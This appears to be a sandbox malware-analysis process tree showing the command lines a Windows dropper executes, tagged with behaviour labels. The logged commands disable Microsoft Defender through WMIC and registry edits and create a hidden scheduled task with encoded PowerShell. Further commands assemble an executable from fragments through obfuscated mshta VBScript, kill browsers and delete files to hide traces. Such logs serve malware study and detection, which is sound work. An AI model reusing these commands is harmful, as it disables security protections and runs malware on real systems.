C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvnIlyeBD" /SC once /ST 04:54:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvnIlyeBD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvnIlyeBD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffdac0b4f50,0x7ffdac0b4f60,0x7ffdac0b4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1908 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1896 /prefetch:88⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2456 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1928 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,16174753072799228854,7979593101972217869,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3240 /prefetch:28⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6940 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 69408⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6940 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\9vdLMR_KRufvVeHAUGxsmK2M.exe"7⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 69408⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\2QVnL8iMDBxYq_KKT0wC2R1_.exe"C:\Users\Admin\Documents\2QVnL8iMDBxYq_KKT0wC2R1_.exe"6⤵
-
C:\Users\Admin\Documents\qZoZQmuBZAOy9fCmUYIULVvZ.exe"C:\Users\Admin\Documents\qZoZQmuBZAOy9fCmUYIULVvZ.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe"C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im eBqlYF_PlHp_DgWOTWFkdGSM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im eBqlYF_PlHp_DgWOTWFkdGSM.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\Kv3g56bKQrQk61SCbRan35Er.exe"C:\Users\Admin\Documents\Kv3g56bKQrQk61SCbRan35Er.exe"6⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\f2VWkkeepL4LqeyAmo1wo_yz.exe"C:\Users\Admin\Documents\f2VWkkeepL4LqeyAmo1wo_yz.exe"8⤵
-
C:\Users\Admin\Documents\K3eB8P7WT3zzB0mOxy7gzfH0.exe"C:\Users\Admin\Documents\K3eB8P7WT3zzB0mOxy7gzfH0.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"C:\Users\Admin\Documents\Z7G064Ykp6b8nPZ3PHwQSiXK.exe"9⤵
-
C:\Users\Admin\Documents\kizRNzMegzbl8oHFYZN_OKq4.exe"C:\Users\Admin\Documents\kizRNzMegzbl8oHFYZN_OKq4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp6180_tmp.exe10⤵
-
C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\hqQhjiMzGy5O7q3zHm8d2Nwp.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "hqQhjiMzGy5O7q3zHm8d2Nwp.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\PAPnQ3LBtB6qPfr5Zy6eTGRb.exe"C:\Users\Admin\Documents\PAPnQ3LBtB6qPfr5Zy6eTGRb.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe"C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6609⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 6849⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 8009⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 8809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 9289⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 11769⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 12449⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "j33PZfVi2SJxBkQ8QMNJtRtd.exe" /f & erase "C:\Users\Admin\Documents\j33PZfVi2SJxBkQ8QMNJtRtd.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "j33PZfVi2SJxBkQ8QMNJtRtd.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\gK81cYZvQFyHCz4tPMFZfiO9.exe"C:\Users\Admin\Documents\gK81cYZvQFyHCz4tPMFZfiO9.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS573F.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS66C0.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
